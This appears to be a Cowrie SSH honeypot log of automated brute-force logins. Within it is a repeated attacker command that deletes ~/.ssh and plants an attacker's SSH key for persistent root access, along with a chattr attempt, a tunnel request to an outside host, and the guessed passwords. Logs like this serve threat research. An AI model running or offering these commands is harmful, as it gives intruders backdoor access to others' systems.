{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:01:14.015917Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:01:14.101871Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:14.103000Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44264,"dst_ip":"1.2.3.4","dst_port":22,"session":"4679e88239c5","protocol":"ssh","message":"New connection: 212.227.235.229:44264 (1.2.3.4:22) [session: 4679e88239c5]","sensor":"my-vps","timestamp":"2025-09-09T08:01:14.183649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:01:14.184373Z","src_ip":"212.227.235.229","session":"4679e88239c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:01:14.267383Z","src_ip":"212.227.235.229","session":"4679e88239c5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:01:14.649356Z","src_ip":"212.227.235.229","session":"4679e88239c5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:15.735234Z","src_ip":"212.227.235.229","session":"4679e88239c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44266,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7081b8669e7","protocol":"ssh","message":"New connection: 212.227.235.229:44266 (1.2.3.4:22) [session: a7081b8669e7]","sensor":"my-vps","timestamp":"2025-09-09T08:01:15.820055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:01:15.820995Z","src_ip":"212.227.235.229","session":"a7081b8669e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:01:15.905629Z","src_ip":"212.227.235.229","session":"a7081b8669e7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:01:16.285256Z","src_ip":"212.227.235.229","session":"a7081b8669e7"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:16.371825Z","src_ip":"212.227.235.229","session":"bfcb406c2fa2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:16.372720Z","src_ip":"212.227.235.229","session":"a7081b8669e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29605,"dst_ip":"1.2.3.4","dst_port":22,"session":"a005f71e10e9","protocol":"ssh","message":"New connection: 212.227.235.229:29605 (1.2.3.4:22) [session: a005f71e10e9]","sensor":"my-vps","timestamp":"2025-09-09T08:01:44.072806Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:44.073840Z","src_ip":"212.227.235.229","session":"a005f71e10e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29926,"dst_ip":"1.2.3.4","dst_port":22,"session":"be1d1f2e3c2b","protocol":"ssh","message":"New connection: 212.227.235.229:29926 (1.2.3.4:22) [session: be1d1f2e3c2b]","sensor":"my-vps","timestamp":"2025-09-09T08:01:44.194932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:01:44.195834Z","src_ip":"212.227.235.229","session":"be1d1f2e3c2b"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T08:01:44.326648Z","src_ip":"212.227.235.229","session":"be1d1f2e3c2b"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:01:44.721951Z","src_ip":"212.227.235.229","session":"be1d1f2e3c2b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T08:01:44.853767Z","session":"be1d1f2e3c2b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50048,"dst_ip":"1.2.3.4","dst_port":22,"session":"a63654ef032a","protocol":"ssh","message":"New connection: 217.72.205.35:50048 (1.2.3.4:22) [session: a63654ef032a]","sensor":"my-vps","timestamp":"2025-09-09T08:01:50.823940Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:01:50.825306Z","src_ip":"217.72.205.35","session":"a63654ef032a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46772,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ccc4084a222","protocol":"ssh","message":"New connection: 212.227.235.229:46772 (1.2.3.4:22) [session: 8ccc4084a222]","sensor":"my-vps","timestamp":"2025-09-09T08:02:24.771302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:02:24.772197Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:02:24.857190Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.login.success","username":"root","password":"com123","message":"login attempt [root/com123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.238968Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:02:25.465217Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.465982Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.467097Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.553041Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:02:25.742313Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.743221Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.831416Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.832577Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46784,"dst_ip":"1.2.3.4","dst_port":22,"session":"021726d4258a","protocol":"ssh","message":"New connection: 212.227.235.229:46784 (1.2.3.4:22) [session: 021726d4258a]","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.915328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:02:25.916274Z","src_ip":"212.227.235.229","session":"021726d4258a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:02:26.006086Z","src_ip":"212.227.235.229","session":"021726d4258a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:02:26.388566Z","src_ip":"212.227.235.229","session":"021726d4258a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:02:27.484442Z","src_ip":"212.227.235.229","session":"021726d4258a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46790,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0c76ecfcbf1","protocol":"ssh","message":"New connection: 212.227.235.229:46790 (1.2.3.4:22) [session: f0c76ecfcbf1]","sensor":"my-vps","timestamp":"2025-09-09T08:02:27.567580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:02:27.568435Z","src_ip":"212.227.235.229","session":"f0c76ecfcbf1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:02:27.651943Z","src_ip":"212.227.235.229","session":"f0c76ecfcbf1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:02:28.034858Z","src_ip":"212.227.235.229","session":"f0c76ecfcbf1"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:02:28.119868Z","src_ip":"212.227.235.229","session":"8ccc4084a222"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:02:28.120686Z","src_ip":"212.227.235.229","session":"f0c76ecfcbf1"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:02:54.194915Z","src_ip":"212.227.235.229","session":"be1d1f2e3c2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50744,"dst_ip":"1.2.3.4","dst_port":22,"session":"a78987b1e415","protocol":"ssh","message":"New connection: 212.227.125.160:50744 (1.2.3.4:22) [session: a78987b1e415]","sensor":"my-vps","timestamp":"2025-09-09T08:03:30.922920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:03:30.936314Z","src_ip":"212.227.125.160","session":"a78987b1e415"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34460,"dst_ip":"1.2.3.4","dst_port":22,"session":"515cdb86c191","protocol":"ssh","message":"New connection: 212.227.235.229:34460 (1.2.3.4:22) [session: 515cdb86c191]","sensor":"my-vps","timestamp":"2025-09-09T08:03:36.633232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:03:36.634433Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:03:36.718521Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwe123asd","message":"login attempt [root/Qwe123asd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.094391Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
